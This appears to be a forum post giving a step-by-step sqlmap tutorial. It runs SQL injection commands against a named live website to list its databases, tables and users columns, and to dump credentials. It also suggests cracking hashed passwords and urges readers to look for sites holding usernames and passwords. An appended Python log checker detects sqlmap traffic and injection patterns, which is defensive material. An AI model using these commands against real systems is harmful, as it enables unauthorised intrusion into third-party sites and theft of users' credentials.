
Best Open Source Web Vulnerability Tool SQL Map Tutorial

✨ DeeZNuTz

First of all, questions:

Which is better, SqlMap, Havij or SQLi Dumper?
Honestly, they all have great characteristics and they all do things a little bit differently. If you can't dump a database in Havij, try SQLi Dumper, and the reverse. But if both fail, try SqlMap.

Which is faster SqlMap, Havij or SQLi Dumper?
In order from slowest to quickest: Havij, SQLi Dumper, SqlMap.

When I download SqlMap it's a .py file? What is this and how do I run it?
.py is Python; it's a programming language.
To run it you can open: Run > Cmd > cd (SqlMap Installation Path) > sqlmap.py blah blah blah
OR
Shift-click in the installation folder containing sqlmap, choose "Open Command Prompt Here" and simply type sqlmap.py blah blah blah.

Do I need to understand Python to use sqlmap?
No.

Where can I download sqlmap?

===============TUTORIAL===============
First off, open the command prompt in the sqlmap installation path.
Second, find the link that you want to dump. For tutorial purposes we will be using this link:
Code:


Now that we have the link we wish to map out, we are going to run this command:
sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 --dbs

And you're going to receive this on your screen:
Go ahead and tap y and press the enter button, after which your screen might look like this:
For this link we will tap y and press enter again. You will receive this message:
Aaaggaainnn tap y and press enter.
Now this screen might take a little bit depending on connection speed, etc., so let it run its course, and once it has, your screen is going to end up looking like this:
Now for this specific link this is a good spot to tap n and press enter, but if you wish you may test them all.
-----------------------------------------------------------------------------------------
Now if you were smart and pressed the n button like I did, you're gonna receive 2 databases (outlined in the red box).
The information schema is what actually allows us to not do blind injection, which could take a while considering it has to test every symbol available on the keyboard for each column (a-z, 0-9, symbols, etc.). If it is a blind injection it will test through every one until the correct symbol, number or letter returns true. Luckily for us, we don't need to!
So the database we want is the marstair1 database, and how we're going to open it is by issuing this command:
Code:

sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 --tables

What this is going to do is get every table for us! Wow, easy, right? Unfortunately for me it also got the information schema tables, but hey, no big deal. It's just going to take me a little bit longer to fetch all the tables.
Now that we have dumped all the tables, you can either view them in the cmd prompt or check the log that it saved them in! The save path is C:\Users\(user)\.sqlmap\output, so for me in this case I will check: C:\Users\William\.sqlmap\output. You will see a file called "log"; just go ahead and open that in your favorite text editor! (Notepad, Notepad++, etc.)
Here's the view from cmd:
And here's from the text document:
Okay! So now we've gotten our database named marstair1 with all the tables included! Now the table that catches my eye is the users table. I'm gonna go a little bit deeper into that one and get the columns of it by using this command:
Code:

sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 -T users --columns

Great, now we got all the columns of the users table! Just so we don't lose each other, this is what it looks like:
Here's the view from cmd:
And here's from the text document:
What a spree of luck ;) In here there are the IDs, emails, usernames and passwords!
So I'm going to choose username and dump that first by typing this:
Code:

sqlmap.py -u http://www.marstair.com/products.php?catid=14999999.9 -D marstair1 -T users -C username --dump

NOTE: adding --threads 10 at the end of this command can make things faster! (Only for good connections.)
I don't think I'll have to post a picture for you to notice we didn't find anything in the username column! Unfortunately there's nothing to be found here, but if you do happen to find a website that does have usernames and passwords, you can find all the dumped data in the folders I gave before!
Sorry this website didn't have anything in it, but I wanted to keep that part out simply to give you guys courage to explore with sqlmap!
HINT: IF THE PASSWORD IS HASHED YOU CAN USE THE BUILT-IN DEHASHER IN SQLMAP!
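Added example, not part of the original post: a small Python checker for web server access logs that flags the kind of traffic this tutorial produces, namely sqlmap's default User-Agent and tampered values in a parameter the application only ever expects as an integer (the catid=14999999.9 probe and textbook keyword payloads). The log lines, the RFC 5737 test addresses and the set of integer-only parameters are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Textbook probes an injection tool sends while fingerprinting a parameter.
SQLI_RE = re.compile(
    r"(union\s+(all\s+)?select|\b(and|or)\s+\d+\s*=\s*\d+|'\s*(and|or)\b|--\s|/\*|\bsleep\s*\()",
    re.IGNORECASE,
)
# Assumption: the application only ever expects these parameters as integers.
INT_PARAMS = {"catid"}

# Constructed sample traffic (RFC 5737 test addresses), not real log data.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products.php?catid=14 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /products.php?catid=14999999.9 HTTP/1.1" 200 412 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /products.php?catid=14%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /products.php?catid=14%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

def inspect_request(line):
    """Return (client_ip, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    reasons = []
    if "sqlmap" in m["ua"].lower():  # sqlmap's default User-Agent unless the operator overrides it
        reasons.append("sqlmap user-agent")
    query = urlsplit(m["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes values
        if name in INT_PARAMS and not re.fullmatch(r"-?\d+", value):
            reasons.append(f"non-integer value for {name}")  # e.g. the 14999999.9 probe
        if SQLI_RE.search(value):
            reasons.append(f"sql keywords in {name}")
    return m["ip"], reasons

def scan_log(text, threshold=2):
    """Count suspicious requests per client; return those at or above the threshold."""
    hits = Counter()
    for line in text.splitlines():
        parsed = inspect_request(line)
        if parsed and parsed[1]:
            hits[parsed[0]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}
```

Changing the User-Agent defeats only the first check; the parameter-value checks still fire, which is why per-client counting over a window is the more useful signal.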